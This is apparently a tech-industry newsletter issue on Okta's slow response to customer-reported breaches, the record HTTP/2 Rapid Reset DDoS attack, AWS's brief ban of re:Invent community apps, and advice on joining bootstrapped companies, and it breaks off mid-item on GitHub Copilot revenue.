The Pulse #67: Okta Schooled on Its Security Practices
Also: the largest DDoS attack to date mitigated; AWS quickly reversed the banning of re:Invent community apps; and advice for engineers considering joining a bootstrapped company.
Today's topics are:
Industry pulse. A roundup of recent events, with commentary. The largest DDoS to date mitigated; a one-year-old AI company worth $500M; a potential L8-L9 slowdown at Google and more.
Okta schooled on security practices – by its own customers. One of Okta’s customers reported a security breach. Okta did nothing. Then, another reported it. Okta still did nothing. 20 days after the first report, Cloudflare – another Okta customer – detected the exact same security breach. How do Okta’s customers have better security processes than Okta, a security-focused company?
AWS’s swiftly unbans re:Invent scheduling apps. Developers maintaining community websites to help schedule talks to attend on re:Invent (AWS’s annual event) received an unfriendly message, telling them they must remove all AWS content. While AWS leadership reversed this decision in a day: one of the scheduling apps had already complied with the demand, and deleted its production database.
Advice for software engineers considering joining a bootstrapped company. Former Lyft software engineer – now the cofounder of the bootstrapped company Friendly Captcha – Guido Zuidhof shares what characteristics he looks for in early hires, and traits that help with thriving in this position.
1. Industry pulse
AWS, Cloudflare, Google, and Microsoft defended against the largest DDoS to date
On 28 August 2023, AWS saw its largest distributed denial of service attack, peaking at 155M req/sec. More attacks followed, hiring different cloud providers throughout the month of September and October. Cloudflare handled 201M req/sec (!), and Google said this attack peaked at 398 million requests/sec (!!). This load was 8x the second-largest recorded DDoS attack in the past, at Google.
What enabled this attack was a zero-day HTTP/2 vulnerability called HTTP/2 Rapid Reset. Here is how Google explains it:
The attack utilized a newly discovered vulnerability with HTTP/2 called Rapid Reset: the attacker sends an RST_STREAM frame immediately after sending a request frame. This cancels the request but leaves the HTTP/2 connection open: which made this attack so efficient.
And this is how requests peaked at 398 million requests per second in just 30 seconds, as visualized by Google:
The major infrastructure providers have gotten together to fix this attack vector: and all major cloud providers have since fixed this vulnerability. This attack vector is tracked under the CVE-2023-44487 Common Vulnerabilities and Exposures (CVE) database. Read the summaries on this attack by Google, by AWS, by Cloudflare, and by Azure.
GitHub Copilot has more than 1M paying customers
It was two weeks ago that GitHub Copilot announced that it passed $100M in annual run rate for revenue. This week, Microsoft CEO Satya Nadella announced on Microsoft’s earnings call: